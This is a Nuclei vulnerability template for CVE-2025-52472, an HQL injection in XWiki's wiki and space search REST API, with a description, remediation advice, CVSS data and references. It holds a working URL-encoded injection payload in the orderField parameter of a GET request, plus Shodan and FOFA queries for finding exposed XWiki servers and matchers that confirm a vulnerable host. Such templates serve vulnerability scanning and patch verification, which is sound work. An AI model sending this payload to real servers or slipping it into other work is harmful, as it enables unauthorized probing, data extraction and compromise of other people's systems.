XWiki is vulnerable to Hibernate Query Language (HQL) injection in the wiki and space search REST API starting in version 4.3-milestone-1 and prior to versions 16.10.9, 17.4.2, and 17.5.0. The vulnerability allows attackers to inject malicious HQL queries through the orderField parameter, potentially leading to data extraction, authentication bypass, or remote code execution depending on database backend and configuration.
PoC代码[已公开]
id: CVE-2025-52472
info:
name: XWiki - HQL Injection
author: ritikchaddha
severity: high
description: |
XWiki is vulnerable to Hibernate Query Language (HQL) injection in the wiki and space search REST API starting in version 4.3-milestone-1 and prior to versions 16.10.9, 17.4.2, and 17.5.0. The vulnerability allows attackers to inject malicious HQL queries through the orderField parameter, potentially leading to data extraction, authentication bypass, or remote code execution depending on database backend and configuration.
remediation: |
Update XWiki to a version that patches this vulnerability. Review and sanitize all user-controlled parameters that are used in database queries, especially those passed to HQL queries.
reference:
- https://jira.xwiki.org/browse/XWIKI-23247
- https://nvd.nist.gov/vuln/detail/CVE-2025-52472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-52472
epss-score: 0.02244
epss-percentile: 0.84031
cwe-id: CWE-89
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2025,xwiki,hqli,sqli
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/rest/wikis/xwiki/search?q=test&scope=title&orderField=doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D%27%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment%27%20or%20a%3D%27%20order%20by%20doc.fullName"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "xwiki", "QueryException: Exception while executing query. Query statement")'
- 'contains(content_type, "text/plain")'
- 'status_code == 500'
condition: and
# digest: 490a00463044022030b7e48c4e39fed1ebe5a9d14f41f79c835775679c79234f1125983319d6c8b8022055a1282207125d6cc2ec60fab3d564ac78e8c2d6c11aa55d3bd1324b7eed7969:922c64590222798bb761d5b6d8e72950